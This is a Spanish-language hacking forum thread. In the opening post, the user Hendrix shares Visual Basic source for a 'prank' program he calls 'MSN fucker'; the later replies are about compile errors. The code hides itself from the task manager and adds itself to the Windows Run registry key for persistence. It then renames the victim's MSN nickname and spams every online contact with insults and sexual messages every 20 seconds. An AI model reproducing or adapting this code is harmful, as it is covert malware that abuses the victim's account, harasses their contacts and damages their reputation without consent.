Autor
|
Tema: [Broma para MSN]: MSN fucker By Hendrix (Leído 5,184 veces)
|
Hendrix
|
Weno, os dare el kode de un simple programa que e programado en 10 minutitos (lo que hace el aburrimiento..jajajaja ) Las caracteristikas de este programa son: - Se ejekuta cada Sesion - 10 insultos (de Kizar y algunos mios) - Cambia el Nik del MSN por un insulto - Envia cada 20 segundos Un mensage a todos los usuarios agregados con un insulto - No aparece en el Taskmanager - La activacion es retardada (espera 1 minuto a activarse todo) Weno, les dejo el kode: Option Explicit Public WithEvents MSN As MessengerAPI.Messenger Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer Dim Men As String, Palabra As Long Dim KeyResult As String Dim contactos As MessengerAPI.IMessengerContact Dim user As IMessengerContact Dim I As Integer
Private Sub Form_Load() On Error Resume Next App.TaskVisible = False Dim Hendrix Set MSN = New MessengerAPI.Messenger Set Hendrix = CreateObject("WScript.Shell") Hendrix.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32", App.Path & "\" & App.EXEName & ".exe" End Sub
Private Sub Timer1_Timer() On Error Resume Next Palabra = Int((Rnd * 10) + 1) Select Case Palabra Case 1 Men = "k te jodan!!" Case 2 Men = "Idiota" Case 3 Men = "Hijo de p**a" Case 4 Men = "Me cago en tu p**a madre" Case 5 Men = "Cabron" Case 6 Men = "Me la kieres chupar???" Case 7 Men = "Me cago en la p**a zorra de tu madre" Case 8 Men = "Me cago en tus muertos!!!!" Case 9 Men = "Hijo de la gran p**a!!!!" Case 10 Men = "La zorra mas grande del planeta??? TU p**a MADRE!!!!" End Select
KeyResult = GetAsyncKeyState(13) If KeyResult = -32767 Then SendKeys Men & "{enter}" End If
MSN.OptionsPages 0, MOPT_GENERAL_PAGE SendKeys (Text1.Text & "{ENTER}")
End Sub
Private Sub Timer2_Timer() On Error Resume Next For Each user In MSN.MyContacts
If contactos.Status = MISTATUS_ONLINE Then List1.AddItem contactos.SigninName End If
For I = 0 To List1.ListCount - 1 MSN.InstantMessage List1.List(I) SendKeys (" Kieres follar konmigo?? Soy un kapullo!!!! [Infectado kon un programa de Hendrix] ") SendKeys ("{ENTER}") Next Next
End Sub
Private Sub Timer3_Timer() On Error Resume Next Timer1.Enabled = True Timer2.Enabled = True End Sub
Tienen que agregar esto: 1 Textbox 1 Listbox 3 Timers Y ya sta, si ven algun error posteadlo... Salu2 Hendrix
|
|
|
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
|
|
|
Robokop
|
la api de messenger esta mal , no señalaste que referencias necestia depura todos los errores corrijelos y luego lo posteas bien
|
|
|
|
|
|
|
Hendrix
|
en donde esta el error???? Lo e mirado y no lo veo... Weno, lo repasare... Salu2 Hendrix
|
|
|
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
|
|
|
BriaNUR
|
lo que dice robokop es verdad, me sale un error cuando lo voy a compilar.
|
|
|
|
|
|
|
Robokop
|
public WithEvents MSN As MessengerAPI.Messenger aqui esta el error estas seguro que tu hiciste el programa ?¿??? y tambien si vas a usar el messenger para aplicaciones Debes de escribir que referencias necesita o que librerias
|
|
|
|
|
|
|
Hendrix
|
Las referencias ya las agregue, el kode que me as mostrado es de un Texto de Buskapina, pero ahora lo korrijo... Salu2 Hendrix
|
|
|
|
|
|
|
Hendrix
|
Weno pondre un trozo del texto de buskapina: Bueno, antes que nada, crean el proyecto y van a "Proyecto/Referencias" y buscan "Messenger Api Type Library", "Messenger Private Type Library" y "Messenger Type Library". Todo esto teniendo en cuenta que el "Windows Messenger" està instalado Estas son las referencia a agregar, si lo kompilo asi no me da error... Salu2 Hendrix
|
|
|
|
|
|
|
hackpsycho
|
Me sale error al momento de querer cargar las referencias pork sera??
|
|
|
|
|
|
|
Hendrix
|
La verdad, no veo el error.... Help plis... Enga, Salu2 Hendrix
|
|
|
|
|
|
|
xXnewbieXx
|
mmm a lo mjor mi pregunta es stupida no c, d toas formas pregunto y asi aprendo en caso d estar ekivokado. Para q quieres el 3er timer? veo k pones los otros 2 en enabled, pero si lo pones en las propiedades no seria lo mismo? salu2 y en caso d ekivokarme perdonen!
|
|
|
|
Hardware: Lo que golpeas. Software: La causa
Error 943 - El sistema esta funcionando demasiado bien, se caerá para seguir con la rutina...
|
|
|
|
|